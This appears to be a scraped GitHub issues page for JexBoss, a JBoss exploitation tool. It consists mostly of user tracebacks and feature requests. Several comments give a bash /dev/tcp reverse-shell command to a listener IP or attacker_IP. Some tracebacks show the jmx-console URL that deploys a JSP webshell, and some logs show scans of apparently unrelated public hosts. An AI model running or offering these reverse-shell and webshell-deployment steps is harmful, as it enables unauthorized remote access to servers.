joaomatosf / jexboss
JexBoss: Jboss (and Java Deserialization Vulnerabilities) verify and EXploitation Tool
License: Other
Hello
I've received this error while exploiting the target:
Traceback (most recent call last):
File "jexboss.py", line 1155, in
main()
File "jexboss.py", line 932, in main
auto_exploit(url, vector)
File "jexboss.py", line 513, in auto_exploit
result = _exploits.exploit_jmx_console_file_repository(url)
File "/root/jexboss/_exploits.py", line 267, in exploit_jmx_console_file_repository
gl_http_pool.request('HEAD', url + payload, redirect=False, headers=headers)
File "/usr/lib/python2.7/dist-packages/urllib3/request.py", line 66, in request
**urlopen_kw)
File "/usr/lib/python2.7/dist-packages/urllib3/request.py", line 87, in request_encode_url
return self.urlopen(method, url, **extra_kw)
File "/usr/lib/python2.7/dist-packages/urllib3/poolmanager.py", line 244, in urlopen
response = conn.urlopen(method, u.request_uri, **kw)
File "/usr/lib/python2.7/dist-packages/urllib3/connectionpool.py", line 671, in urlopen
release_conn=release_conn, **response_kw)
File "/usr/lib/python2.7/dist-packages/urllib3/connectionpool.py", line 671, in urlopen
release_conn=release_conn, **response_kw)
File "/usr/lib/python2.7/dist-packages/urllib3/connectionpool.py", line 671, in urlopen
release_conn=release_conn, **response_kw)
File "/usr/lib/python2.7/dist-packages/urllib3/connectionpool.py", line 643, in urlopen
_stacktrace=sys.exc_info()[2])
File "/usr/lib/python2.7/dist-packages/urllib3/util/retry.py", line 363, in increment
raise MaxRetryError(_pool, url, error or ResponseError(cause))
urllib3.exceptions.MaxRetryError: HTTPConnectionPool(host='10.175.0.146', port=80): Max retries exceeded with url: /jmx-console/HtmlAdaptor?action=invokeOpByName&name=jboss.admin:service=DeploymentFileRepository&methodName=store&argType=java.lang.String&arg0=jexws4.war&argType=java.lang.String&arg1=jexws4&argType=java.lang.String&arg2=.jsp&argType=java.lang.String&arg3=[URL-encoded JSP payload omitted]&argType=boolean&arg4=True (Caused by ProtocolError('Connection aborted.', BadStatusLine("''",)))
Hi João,
Is there any way to call a real tty, or just making a reverse connection?
thanks!
I'd like to add support for the detection of this vulnerability, would you be interested if I submitted a pull request for this?
I'm executing in the correct syntax:
python jexboss.py -host https://host
I keep getting this returned:
parser.add_argument('-mode', help="Operation mode", choices={'standalone','auto-scan', 'file-scan'}, default='standalone')
What am I doing wrong? Thanks!
OpenSSL::SSL::SSLError SSL_connect returned=1 errno=0 state=error: dh key too small
I often get that kind of result when the code is deployed :
Example:
Shell>jexremote=192.168.0.10:4444
Or use other techniques of your choice, like:
Shell>/bin/bash -i > /dev/tcp/192.168.0.10/4444 0>&1 2>&1
And so on... =]
Thanks.
Hello,
Is it possible to add a "-y" flag for the exploit testing? This way the code can essentially perform an autoscan/exploit when running an individual host-based scan.
Unknown command
Unknown command
Failed to check for updates
Unknown command
[Type commands or "exit" to finish]
Shell> ls
Unknown command
[Type commands or "exit" to finish]
Shell> ipconfig
Failed to check for updates
Unknown command
[Type commands or "exit" to finish]
Shell>
Hello,
Suggestions? I saw the other list index out of range issue. Figured this is probably the same. Is code actually being uploaded? But not able to connect back to the reverse shell?
I'm running this externally and internally.
@Version: 1.0.11
Traceback (most recent call last):
File "./jexboss.py", line 532, in
main()
File "./jexboss.py", line 381, in main
auto_exploit(url, i)
File "./jexboss.py", line 230, in auto_exploit
shell_http(url, exploit_type)
File "./jexboss.py", line 271, in shell_http
resp += " " + str(r.data).split(">")[1]
IndexError: list index out of range
Is there a CVE or any writeups you can link to associated with commit 7411be3?
Hi friend,
I noticed that you provided a --load-gadget flag. Does this mean I can use ysoserial to generate a payload? Can you tell me how you generated the built-in payloads?
Thanks!
When running on the default Kali 2016 install (or Ubuntu derivatives, etc.), the following error message is seen:
Traceback (most recent call last):
File "jexboss.py", line 23, in <module>
from idlelib.ColorDelegator import prog
ImportError: No module named idlelib.ColorDelegator
This is a dependency issue (https://pypi.python.org/pypi/cricket/0.2.3). Kali and Ubuntu's packaging of Python omits the idlelib library from its base package.
Users can install idlelib by running:
$ sudo apt-get install idle-python2.7
Can you tell me what you use to create the JSP shellcode?
like:
jsp = ("[URL-encoded JSP payload omitted]")
When I use -A in file-scan mode, I get something wrong. Can -A only be used in standalone mode?
Not sure if it is a bug or a feature, but if you try to exploit a vulnerability in a Windows target the Shell doesn't work. All the vulnerabilities are correctly identified though.
Hi, I want to add your tool into ArchStrike. Would it be possible to add a license file?
I'm getting the following SSL issue. Any way to fix this?
[*] Checking JMXInvokerServlet:
*** An error occurred while connecting to the host https://example.com/ ([SSL: UNSUPPORTED_PROTOCOL] unsupported protocol (_ssl.c:661))**
Hello,
Thanks for this good job.
Please, if we have a Windows server,
how do we interact with a Metasploit Windows listener?
I want the equivalent command to this one:
/bin/bash -i > /dev/tcp/attacker_IP/4444 0>&1 2>&1
thx
Checking for updates in: http://joaomatosf.com/rnp/releases.txt **
Error: could not check for updates ...
** Checking Host: http://google.com **
[*] Checking JMX Tomcat:
Hi, on:
Python 2.7.12 (default, Nov 7 2016, 11:55:55)
[GCC 6.2.1 20160830] on linux2
after:
/opt/jexboss:
> sudo pip install -r requires.txt
Requirement already satisfied: urllib3>=1.8 in /usr/lib/python2.7/site-packages (from -r requires.txt (line 1))
Requirement already satisfied: ipaddress in /usr/lib/python2.7/site-packages (from -r requires.txt (line 2))
I've got a problem with the exploit:
** Checking Host: http://10.0.0.2:8081 **
* Checking admin-console: [ OK ]
* Checking web-console: [ VULNERABLE ]
* Checking jmx-console: [ VULNERABLE ]
* Checking JMXInvokerServlet: [ VULNERABLE ]
* Do you want to try to run an automated exploitation via "jmx-console" ?
This operation will provide a simple command shell to execute commands on the server..
Continue only if you have permission!
yes/NO? yes
* Sending exploit code to http://10.0.0.2:8081. Please wait...
Traceback (most recent call last):
File "./jexboss.py", line 681, in <module>
main()
File "./jexboss.py", line 520, in main
auto_exploit(url, i)
File "./jexboss.py", line 303, in auto_exploit
result = _exploits.exploit_jmx_console_file_repository(url)
File "/opt/jexboss/_exploits.py", line 176, in exploit_jmx_console_file_repository
gl_http_pool.request('HEAD', url + payload, redirect=False, headers=headers)
File "/usr/lib/python2.7/site-packages/urllib3/request.py", line 66, in request
**urlopen_kw)
File "/usr/lib/python2.7/site-packages/urllib3/request.py", line 87, in request_encode_url
return self.urlopen(method, url, **extra_kw)
File "/usr/lib/python2.7/site-packages/urllib3/poolmanager.py", line 244, in urlopen
response = conn.urlopen(method, u.request_uri, **kw)
File "/usr/lib/python2.7/site-packages/urllib3/connectionpool.py", line 671, in urlopen
release_conn=release_conn, **response_kw)
File "/usr/lib/python2.7/site-packages/urllib3/connectionpool.py", line 671, in urlopen
release_conn=release_conn, **response_kw)
File "/usr/lib/python2.7/site-packages/urllib3/connectionpool.py", line 671, in urlopen
release_conn=release_conn, **response_kw)
File "/usr/lib/python2.7/site-packages/urllib3/connectionpool.py", line 643, in urlopen
_stacktrace=sys.exc_info()[2])
File "/usr/lib/python2.7/site-packages/urllib3/util/retry.py", line 363, in increment
raise MaxRetryError(_pool, url, error or ResponseError(cause))
urllib3.exceptions.MaxRetryError: HTTPConnectionPool(host='10.0.0.2', port=8081): Max retries exceeded with url: /jmx-console/HtmlAdaptor?action=invokeOpByName&name=jboss.admin:service=DeploymentFileRepository&methodName=store&argType=java.lang.String&arg0=jexws4.war&argType=java.lang.String&arg1=jexws4&argType=java.lang.String&arg2=.jsp&argType=java.lang.String&arg3=[URL-encoded JSP payload omitted]&argType=boolean&arg4=True (Caused by ProtocolError('Connection aborted.', BadStatusLine("''",)))
Any clue how to prevent this kind of error?
Hi, thanks for the awesome tool, but I want to ask how we can use our own payload with --load-gadget. Or can you please add the ysoserial payload generation tool to automate this? I see you added some of them but not all. Sorry for my bad English. Thank you for your attention. Regards.
Getting following error when trying admin_console
[code]
Traceback (most recent call last):
File "./jexboss.py", line 681, in
main()
File "./jexboss.py", line 520, in main
auto_exploit(url, i)
File "./jexboss.py", line 313, in auto_exploit
result = _exploits.exploit_admin_console(url, gl_args.jboss_login)
File "/root/jexboss/_exploits.py", line 461, in exploit_admin_console
cookie = r.getheader('set-cookie').split(";")[0]
AttributeError: 'NoneType' object has no attribute 'split'
[/code]
When using standalone mode and -A with a target whose admin-console is vulnerable, I got this:
pydev_imports.execfile(file, globals, locals) # execute the script
File "F:/Dev/Python_Projects/gsz/jexboss.py", line 1016, in
main()
File "F:/Dev/Python_Projects/gsz/jexboss.py", line 885, in main
auto_exploit(url, vector)
File "F:/Dev/Python_Projects/gsz/jexboss.py", line 548, in auto_exploit
result = _exploits.exploit_admin_console(url, gl_args.jboss_login)
File "F:/Dev/Python_Projects/gsz_exploits.py", line 825, in exploit_admin_console
cookie = rheader.split(";")[0]
AttributeError: 'NoneType' object has no attribute 'split'
The line numbers may be wrong because I have modified this version.
It may be caused by the response "set-cookie" being null, because the username/password is wrong.
Hi joaomatosf,
Traceback (most recent call last):
File "jexboss.py", line 660, in
main()
File "jexboss.py", line 542, in main
result_exploit = auto_exploit(url, key)
File "jexboss.py", line 313, in auto_exploit
result = _exploits.exploit_admin_console(url, gl_args.jboss_login)
File "C:\Python2713\jexboss-master_exploits.py", line 466, in exploit_admin_console
payload = "login_form=login_form&login_form%3Aname="+username+"&login_form%3Apassword="+password+"&login_form%3Asubmit=Login&javax.faces.ViewState="+url_encode(state)
File "C:\Python2713\jexboss-master_exploits.py", line 442, in url_encode
return urllib.quote_plus(text)
File "C:\Python2713\lib\urllib.py", line 1303, in quote_plus
if ' ' in s:
TypeError: argument of type 'NoneType' is not iterable
Fresh install without any error on Git Bash for Windows is not working.
$ python jexboss.py -h
Traceback (most recent call last):
File "jexboss.py", line 49, in
from _exploits import *
File "E:\jexboss_exploits.py", line 21, in
from jexboss import *
File "E:\jexboss\jexboss.py", line 64, in
traceback.print_exc(file=debug_file)
NameError: name 'debug_file' is not defined
Hello
I got this error while checking the server:
[*] Checking Servlet Deserialization:
[*] Checking Application Deserialization:
The commands like "cd .." or "cat > Test.txt" are not working ...
Hey great tool! It doesn't seem to work over HTTPS when using port 8443? My guest portal I want to test against is hardset to TCP port 8443 but I get the error below;
** Checking Host: https://10.5.123.4:8443/portal/SelfRegistration.action?from=LOGIN **
[*] Checking Struts2:
Hello,
I have a problem, failed script.
Traceback (most recent call last):
File "jexboss.py", line 415, in
autoExploit(url, i)
File "jexboss.py", line 105, in autoExploit
shell_http(url, type)
File "jexboss.py", line 133, in shell_http
resp += " " + r.data.split(">")[1]
IndexError: list index out of range
Hi,
When I executed the following command to run jexboss:
python jexboss.py -host http://localhost:8080
I am getting the following result
* Checking for updates in: http://joaomatosf.com/rnp/releases.txt **
** Checking Host: http://localhost:8080 **
[*] Checking admin-console: [ OK ]
[*] Checking Struts2:
* An error occurred while connecting to the host http://localhost:8080 (HTTPConnectionPool(host='localhost', port=8080): Max retries exceeded with url: / (Caused by ReadTimeoutError("HTTPConnectionPool(host='localhost', port=8080): Read timed out. (read timeout=6.0)",)))
[*] Checking Servlet Deserialization: [ OK ]
[*] Checking Application Deserialization: [ OK ]
[*] Checking Jenkins: [ OK ]
[*] Checking web-console: [ OK ]
[*] Checking jmx-console: [ OK ]
[*] Checking JMXInvokerServlet: [ OK ]
* Results:
The server is not vulnerable to bugs tested ... :D
* Info: review, suggestions, updates, etc:
https://github.com/joaomatosf/jexboss
* DONATE: Please consider making a donation to help improve this tool,
* Bitcoin Address: 14x4niEpfp7CegBYr3tTzTn4h6DAnDCD9C
Can anyone help me with this? The connection between my workstation and the remote server (for which I have masked the IP with 'localhost' here) is completely fine. I have access to all services on this server.
Hello,
I was wondering, is there a patch already that fixes these vulnerabilities, or can this script be executed on all JBoss versions? :D
Thanks.
@Version: 1.2.4
** Checking Host: google.com **
[*] Checking JMX Tomcat:
An error occurred while connecting to the host google.com (list index out of range)
Results:
The server is not vulnerable to bugs tested ... :D
How can I solve this problem, anyone?
Is anyone having the same error messages as follows?
/usr/local/lib/python2.7/dist-packages/requests/packages/urllib3/connectionpool.py:843: InsecureRequestWarning: Unverified HTTPS request is being made. Adding certificate verification is strongly advised. See: https://urllib3.readthedocs.io/en/latest/advanced-usage.html#ssl-warnings
InsecureRequestWarning)
Based on the recommended URL, I added the disable warning message (not recommended of course) but am still seeing a horde of the warning messages. Any idea?
import urllib3
urllib3.disable_warnings()
I get the following error, even though says successful. Screen dump below. @Version: 1.0.10
Traceback (most recent call last):
File "jexboss.py", line 523, in
main()
File "jexboss.py", line 372, in main
auto_exploit(url, i)
File "jexboss.py", line 221, in auto_exploit
shell_http(url, exploit_type)
File "jexboss.py", line 261, in shell_http
r = pool.request('GET', url + path + cmd, redirect=False, headers=headers)
File "/usr/lib/python2.7/dist-packages/urllib3/request.py", line 68, in request
*_urlopen_kw)
File "/usr/lib/python2.7/dist-packages/urllib3/request.py", line 81, in request_encode_url
return self.urlopen(method, url, *_urlopen_kw)
File "/usr/lib/python2.7/dist-packages/urllib3/poolmanager.py", line 161, in urlopen
response = conn.urlopen(method, u.request_uri, *_kw)
File "/usr/lib/python2.7/dist-packages/urllib3/connectionpool.py", line 617, in urlopen
release_conn=release_conn, *_response_kw)
File "/usr/lib/python2.7/dist-packages/urllib3/connectionpool.py", line 617, in urlopen
release_conn=release_conn, *_response_kw)
File "/usr/lib/python2.7/dist-packages/urllib3/connectionpool.py", line 617, in urlopen
release_conn=release_conn, *_response_kw)
File "/usr/lib/python2.7/dist-packages/urllib3/connectionpool.py", line 597, in urlopen
_stacktrace=sys.exc_info()[2])
File "/usr/lib/python2.7/dist-packages/urllib3/util/retry.py", line 271, in increment
raise MaxRetryError(_pool, url, error or ResponseError(cause))
urllib3.exceptions.MaxRetryError: HTTPConnectionPool(host='x.x.x.x', port=8080): Max retries exceeded with url: /jexws3/jexws3.jsp?ppp=id (Caused by ReadTimeoutError("HTTPConnectionPool(host='x.x.x.x', port=8080): Read timed out. (read timeout=6.0)",))
Got the following error:
* Sending exploit code to [redacted]. Please wait...
* Successfully deployed code! Starting command shell. Please wait...
* - - - - - - - - - - - - - - - - - - - - LOL - - - - - - - - - - - - - - - - - - - - *
* [redacted]:
Traceback (most recent call last):
File "jexboss.py", line 544, in <module>
main()
File "jexboss.py", line 393, in main
auto_exploit(url, i)
File "jexboss.py", line 242, in auto_exploit
shell_http(url, exploit_type)
File "jexboss.py", line 283, in shell_http
resp += " " + str(r.data).split(">")[1]
IndexError: list index out of range
I'm not sure if the site's IPS is the one causing the issue.
Hi,
Got an error while executing other commands like 'cd' or any other command.
I'm getting the following error when trying to use jexboss for the first time:
Hi, joaomatosf,
When I use your tool to exploit, I find many false alarms.
I was told they were all VULNERABLE, then I tried to run an automated exploitation to execute a command, but only got an error "*Error contacting the command shell. Try again later..."
Then I tried to access a URL like http://xxxx.com/jmx-console/; the response status is 200 and the body is:
<!--link rel="stylesheet" href="/layout/default.css" type="text/css"-->
<html>
<head>
<script type="text/javascript">
window.location.href='http://xxxxxx.com/404.jsp';
</script>
</head>
<body>
</body>
</html>
I read the code and suspect the logic of the check_vul method in jexboss.py isn't rigorous. In check_vul, the HEAD method is used to get the response, and whether the target is VULNERABLE is judged only by the response's status. If the status is 200 or 500, it is reported as VULNERABLE. But my response's status is 200 and the response's body is a 404 page. So I think it's better to check the body's content to avoid the false alarm.
Thank you!
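The body check suggested in the issue above, sketched as an added example (not jexboss code): a finding is kept only if a GET of the console path returns a page that is not a disguised error page. The function name `classify`, the labels it returns and the regex heuristics are assumptions made for this illustration; a HEAD request cannot be used because it carries no body.

```python
import re
from html.parser import HTMLParser

# Assumed heuristics (not from jexboss): hints that a 200/500 page is really an error page.
ERROR_HINT = re.compile(r"(?:\b404\b|not\s+found|error\.(?:jsp|html?))", re.I)
JS_REDIRECT = re.compile(r"(?:window\.)?location(?:\.href)?\s*=\s*['\"]([^'\"]+)['\"]", re.I)
# Body quoted in the issue above (returned with HTTP 200 for /jmx-console/).
SAMPLE = ("<html><head><script type=\"text/javascript\">"
          "window.location.href='http://xxxxxx.com/404.jsp';</script></head><body></body></html>")


class _PageScan(HTMLParser):
    """Collects redirect targets (script and meta refresh) and visible text."""

    def __init__(self):
        super().__init__()
        self.in_script, self.redirects, self.visible = False, [], []

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "script":
            self.in_script = True
        elif tag == "meta" and (a.get("http-equiv") or "").lower() == "refresh":
            m = re.search(r"url\s*=\s*(\S+)", a.get("content") or "", re.I)
            if m:
                self.redirects.append(m.group(1))

    def handle_endtag(self, tag):
        if tag == "script":
            self.in_script = False

    def handle_data(self, data):
        if self.in_script:
            self.redirects += JS_REDIRECT.findall(data)
        elif data.strip():
            self.visible.append(data.strip())


def classify(status, body):
    """Return 'candidate', 'soft-404' or 'absent' for a GET of a console path."""
    if status not in (200, 500):
        return "absent"
    scan = _PageScan()
    scan.feed(body)
    if any(ERROR_HINT.search(target) for target in scan.redirects):
        return "soft-404"  # page immediately redirects to an error page
    text = " ".join(scan.visible)
    if not text or ERROR_HINT.search(text):
        return "soft-404"  # empty page or error wording behind a 200/500
    return "candidate"     # still needs manual confirmation
```

A `candidate` result only means the status code was not contradicted by the body; it is a triage filter for scanner output, not proof that the console is exposed.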
I'm getting connection timed out, probably because from the machine I'm running on I can only access the internet via a proxy.
I thought that using the "-D" option would avoid the error below, but I got the same error. Shouldn't this option prevent the call to http://joaomatosf.com/rnp/releases.txt?
So actually this issue is a feature request to implement proxy support.
Traceback (most recent call last):
File "jexboss.py", line 551, in <module>
main()
File "jexboss.py", line 367, in main
updates = check_updates()
File "E:\jexboss\_updates.py", line 107, in check_updates
r = pool.request('GET', url, redirect=False, headers=header)
File "E:\Python27\lib\site-packages\urllib3\request.py", line 66, in request
**urlopen_kw)
File "E:\Python27\lib\site-packages\urllib3\request.py", line 87, in request_encode_url
return self.urlopen(method, url, **extra_kw)
File "E:\Python27\lib\site-packages\urllib3\poolmanager.py", line 244, in urlopen
response = conn.urlopen(method, u.request_uri, **kw)
File "E:\Python27\lib\site-packages\urllib3\connectionpool.py", line 671, in urlopen
release_conn=release_conn, **response_kw)
File "E:\Python27\lib\site-packages\urllib3\connectionpool.py", line 671, in urlopen
release_conn=release_conn, **response_kw)
File "E:\Python27\lib\site-packages\urllib3\connectionpool.py", line 671, in urlopen
release_conn=release_conn, **response_kw)
File "E:\Python27\lib\site-packages\urllib3\connectionpool.py", line 643, in urlopen
_stacktrace=sys.exc_info()[2])
File "E:\Python27\lib\site-packages\urllib3\util\retry.py", line 303, in increment
raise MaxRetryError(_pool, url, error or ResponseError(cause))
urllib3.exceptions.MaxRetryError: HTTPConnectionPool(host='joaomatosf.com', port=80): Max retries exceeded with url: /rnp/releases.txt (Caused by ConnectTimeoutError(<urllib3.connection.HTTPConnection object at 0x000000000357A518>, 'Connection to joaomatosf.com timed out. (connect timeout=3.0)'))
I noticed that the variable was declared as "auto-exploit", but was referenced as "auto_exploit" in the rest of the code (dash vs. underscore). This may be causing issues with the intended function of the auto-exploit feature:
Line 505: parser.add_argument("--auto-exploit", "-A",....
Line 228: if not gl_args.auto_exploit:
Hi,
Firstly, thanks for the great tool!
I'm not aware of any way to resume a session with an already exploited server (on which the webshell is already deployed), have I missed something?
If not I think it can be an interesting feature to implement.
Thanks!
** Checking Host: http://www.frauen-ficken.webcam-sex-chat.net **
Traceback (most recent call last):
File "jexboss.py", line 523, in <module>
main()
File "jexboss.py", line 372, in main
auto_exploit(url, i)
File "jexboss.py", line 221, in auto_exploit
shell_http(url, exploit_type)
File "jexboss.py", line 262, in shell_http
resp += " " + str(r.data).split(">")[1]
IndexError: list index out of range
** Checking Host: http://188.165.0.15 **
Traceback (most recent call last):
File "jexboss.py", line 523, in <module>
main()
File "jexboss.py", line 372, in main
auto_exploit(url, i)
File "jexboss.py", line 221, in auto_exploit
shell_http(url, exploit_type)
File "jexboss.py", line 262, in shell_http
resp += " " + str(r.data).split(">")[1]
IndexError: list index out of range
Running Python 2.7, the following line returns an r.status of 200:
https://github.com/joaomatosf/jexboss/blob/master/jexboss.py#L120
In certain cases, hosts listening on port 80 do not handle the HEAD request nicely and return a garbage response. It looks like Python 2 is doing this, while Python 3 will see the correct response and generate an exception.
In 2.7:
>>> r = pool.request('HEAD', url +str(paths['admin-console']), redirect=False, headers=headers)
>>> r.status
200
In 3.4:
>>> r = pool.request('HEAD', url +str(paths['admin-console']), redirect=False, headers=headers)
Traceback (most recent call last):
File "/usr/lib/python3/dist-packages/urllib3/connectionpool.py", line 331, in _make_request
httplib_response = conn.getresponse(buffering=True)
TypeError: getresponse() got an unexpected keyword argument 'buffering'
During handling of the above exception, another exception occurred:
Traceback (most recent call last):
File "/usr/lib/python3/dist-packages/urllib3/connectionpool.py", line 516, in urlopen
body=body, headers=headers)
File "/usr/lib/python3/dist-packages/urllib3/connectionpool.py", line 333, in _make_request
httplib_response = conn.getresponse()
File "/usr/lib/python3.4/http/client.py", line 1171, in getresponse
response.begin()
File "/usr/lib/python3.4/http/client.py", line 351, in begin
version, status, reason = self._read_status()
File "/usr/lib/python3.4/http/client.py", line 333, in _read_status
raise BadStatusLine(line)
http.client.BadStatusLine: Ú¬LIP�=¶<��Þ�brĸ�¢nÆGÕc¡»�6Fh¶ñ?àTáÿ»�¾îr»0á�÷<}�Ù6¯�õ¢+àÑÎgìmºc¸ÉfDåÒ��Áþ×�]êÓh¹��ôÕ